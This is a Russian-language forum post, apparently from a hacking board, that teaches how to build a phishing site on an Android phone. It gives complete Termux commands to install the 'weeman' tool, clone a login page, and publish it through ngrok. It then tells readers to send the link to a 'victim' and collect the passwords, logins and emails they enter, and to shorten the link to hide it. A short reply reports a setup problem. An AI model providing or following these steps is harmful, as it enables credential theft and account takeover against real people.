ikabot 3 Опубликовано: 29 окт 2020 Всем привет! Сегодня я вам расскажу и покажу, как создавать фишинговые сайты в интернете на Android. Фишинговый сайт - это копия оригинального сайта, только в нее встроен "шпион", которые отправляет все введенные на ней данные владельцу фишинг странички. То-есть если кто-то введет пароль, логин, почту или иные конфиденциальные данные - вы получите их. Сначала скачаем и установим самую новую версию "Termux":https://play.google.com/store/apps/details?id=com.termux pkg update -y && pkg upgrade -y Установим "git" и "python 2": apt install git && apt install python2 Скачаем утилиту "weeman": git clone https://github.com/evait-security/weeman Установка окончена! Осталось только включить данную утилиту: Откроем директорию инструмента: А теперь включим саму утилиту: python2 weeman.py Программа запущена! Для создания фишинговой странички - читайте статью дальше: set url https://google.com Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ): set action_url https://google.com Устанавливаем порт для дальнейшей работы в "ngrok" ( На не рутированных устройствах - только "8080" ) : set port 8080 Чекаем настройки фишинг странички и запускаем сайт: show run После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства - нам нужно установить и настроить "ngrok", чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве. Откроем новую сессию "termux": Установим "ngrok": apt update && apt upgrade apt install git git clone https://github.com/tchelospy/termux-ngrok.git cd termux-ngrok chmod +x termux-ngrok.sh ./termux-ngrok.sh ( После ввода последней команды - нужно ввести букву "y" для соглашение с установкой "ngrok" ) Теперь нам нужно авторизоваться на сайте "ngrok" любым способом:https://ngrok.com/ После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом 😞 После копирования ключа - нас нужно ввести команду для активации вашего аккаунта в "termux": ngrok authtoken {ВАШ КЛЮЧ} После данных манипуляций ваш аккаунт должен был подключится к "ngrok", который установлен на вашем устройстве. Теперь вам нужно всего лишь ввести данную команду: ngrok http 8080 С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт: Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте - они отобразятся в сессии, там где мы запустили утилиту "weeman". Если вам не нравится данная ссылка - ее можно сократить на любом сайте или приложении по сокращению ссылок. 1 Поделиться сообщением Ссылка на сообщение
Дима 228 0 Опубликовано: 9 янв 2023 У меня после ввода ключа ничего не происходит 0 Поделиться сообщением Ссылка на сообщение
